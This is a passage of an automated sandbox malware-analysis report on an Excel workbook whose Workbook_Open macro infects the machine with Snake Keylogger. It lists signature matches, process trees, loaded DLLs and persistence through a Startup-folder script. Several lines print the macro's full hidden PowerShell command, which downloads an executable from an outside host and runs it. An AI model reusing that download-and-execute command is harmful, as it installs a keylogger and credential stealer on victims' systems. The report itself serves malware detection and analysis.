Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D57C8		5_2_006D57C8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006F7318		5_2_006F7318
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006FCC20		5_2_006FCC20
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006FED30		5_2_006FED30
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D5C020		5_2_00D5C020
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D58D48		5_2_00D58D48
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D578E0		5_2_00D578E0
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D50040		5_2_00D50040
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D5D219		5_2_00D5D219
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D5C347		5_2_00D5C347
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D58D3A		5_2_00D58D3A
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_04980040		5_2_04980040
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_05400040		5_2_05400040
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_0541E350		5_2_0541E350
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_0541DEF8		5_2_0541DEF8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00318A10		8_2_00318A10
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0031CAD8		8_2_0031CAD8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00318A00		8_2_00318A00
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C2D980		8_2_00C2D980
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C20898		8_2_00C20898
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C208A8		8_2_00C208A8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C2D970		8_2_00C2D970
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C20AFE		8_2_00C20AFE
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C274FF		8_2_00C274FF
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C20C56		8_2_00C20C56
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C40040		8_2_00C40040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C4C858		8_2_00C4C858
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C419A3		8_2_00C419A3
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C4D500		8_2_00C4D500
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C440F8		8_2_00C440F8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C4C088		8_2_00C4C088
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C4C848		8_2_00C4C848
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C46858		8_2_00C46858
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C4C078		8_2_00C4C078
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C44108		8_2_00C44108
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C4D4F0		8_2_00C4D4F0
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C457C8		8_2_00C457C8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C57318		8_2_00C57318
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C5CC20		8_2_00C5CC20
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C5CC1E		8_2_00C5CC1E
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C5ED20		8_2_00C5ED20
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C5ED30		8_2_00C5ED30
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0432C020		8_2_0432C020
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_04328D3A		8_2_04328D3A
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_04328D48		8_2_04328D48
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_04320040		8_2_04320040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_043278E0		8_2_043278E0
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0432D219		8_2_0432D219
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0432C347		8_2_0432C347
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_04B70040		8_2_04B70040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_05400040		8_2_05400040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_05400006		8_2_05400006
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0541E350		8_2_0541E350
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0541DEF8		8_2_0541DEF8

Source: DGTCkacbSz.xlsx	OLE, VBA macro line: Private Sub Workbook_Open()
Source: 79E20000.0.dr	OLE, VBA macro line: Private Sub Workbook_Open()

Source: DGTCkacbSz.xlsx	OLE indicator, VBA macros: true
Source: 79E20000.0.dr	OLE indicator, VBA macros: true

Source: 79E20000.0.dr

Stream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.ShellQa1"hExecF

Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: tmp667.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svcost.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@8/14@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DGTCkacbSz.xlsx

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svcost.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR85B2.tmp

Jump to behavior

Source: DGTCkacbSz.xlsx	OLE indicator, Workbook stream: true
Source: 79E20000.0.dr	OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................R...............R.................O...........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................R...............R.................O...........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................R...............R.................O...........			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: DGTCkacbSz.xlsx

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: bcrypt.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DGTCkacbSz.xlsx	Initial sample: OLE zip file path = xl/media/image1.png
Source: 79E20000.0.dr	Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
